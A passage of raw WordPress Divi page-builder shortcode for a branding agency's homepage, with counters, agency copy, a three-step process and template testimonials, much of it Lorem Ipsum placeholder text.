animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just three steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%32%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"|||21px||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" 